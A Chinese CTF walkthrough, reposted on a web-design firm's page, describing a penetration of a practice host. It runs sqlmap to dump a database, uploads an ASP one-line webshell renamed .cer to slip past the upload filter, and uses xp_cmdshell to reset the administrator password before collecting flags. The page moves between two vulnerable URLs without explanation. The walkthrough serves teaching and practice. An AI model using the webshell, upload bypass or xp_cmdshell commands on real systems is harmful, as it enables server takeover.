资讯

精准传达 • 有效沟通

从品牌网站建设到网络营销策划,从策略到执行的一站式服务

CTF主机渗透是实例分析

本文小编为大家详细介绍“CTF主机渗透是实例分析”,内容详细,步骤清晰,细节处理妥当,希望这篇“CTF主机渗透是实例分析”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。

成都创新互联公司专注为客户提供全方位的互联网综合服务,包含不限于网站设计制作、做网站、政和网络推广、成都小程序开发、政和网络营销、政和企业策划、政和品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等,从售前售中售后,我们都将竭诚为您服务,您的肯定,是我们最大的嘉奖;成都创新互联公司为所有大学生创业者提供政和建站搭建服务,24小时服务热线:13518219792,官方网址:www.cdcxhl.com

第一步:我们访问链接:http://202.0.0.23/

进入网页首页,通过浏览观察,找到http://202.0.0.23/NewsList.asp?SortID=17 新闻资讯页面,通过get方法提交的参数名为SortID,值为1,我们尝试一下是否存在sql注入,通过sqlmap去跑一下。

CTF主机渗透是实例分析

发现存在sql注入漏洞
sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 –dbs

CTF主机渗透是实例分析 

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS –tables

CTF主机渗透是实例分析 

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS -T eims_flag –dump

CTF主机渗透是实例分析

查看账号密码的数据库表

CTF主机渗透是实例分析

对b2076528346216b3进行md5解密,解密得密码为admin1234账号为root
第二步:接下来使用御剑后台扫描,找到后台登录页面

右键此页面查看源码,找到一个flag:

CTF主机渗透是实例分析 

第三步:使用账户root密码admin1234登录后台,在后台系统信息-文件上传处上传后缀为.asp的asp一句话木马,一句话木马内容:<%eval request("caidao")%>  (按照asp一句话木马格式)

CTF主机渗透是实例分析

结果提示上传文件格式不对,想下绕过办法 

CTF主机渗透是实例分析

这里我们将一句话木马文件改一个可执行的后缀.cer

CTF主机渗透是实例分析

则上传成功
第四步:下面我们直接上菜刀工具了

CTF主机渗透是实例分析

在网站根目录发现flag文件flag3{23c5b149510105853f5e7ef9a6f06627}

CTF主机渗透是实例分析 

在数据库配置文件中找到数据库的账号密码

CTF主机渗透是实例分析 

使用一句话木马连接mssql数据库

CTF主机渗透是实例分析

利用mssql数据库的xpcmdshell组件执行系统命令 EXEC master..xp_cmdshell 'whoami'

CTF主机渗透是实例分析

当前cmdshell的权限是system权限,所以直接修改administrator的密码为hacker:EXEC master..xp_cmdshell 'net user administrator 123456'

CTF主机渗透是实例分析

第五步:直接远程桌面连接服务器administrator/123456,在桌面发现flag文件,flag5{47baf6d9d60f40c8b1dafa56c62fcd06}

在c盘发现另外一个flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}

读到这里,这篇“CTF主机渗透是实例分析”文章已经介绍完毕,想要掌握这篇文章的知识点还需要大家自己动手实践使用过才能领会,如果想了解更多相关内容的文章,欢迎关注创新互联行业资讯频道。


网页题目:CTF主机渗透是实例分析
网站网址:http://cdkjz.cn/article/pcspih.html
多年建站经验

多一份参考,总有益处

联系快上网,免费获得专属《策划方案》及报价

咨询相关问题或预约面谈,可以通过以下方式与我们联系

大客户专线   成都:13518219792   座机:028-86922220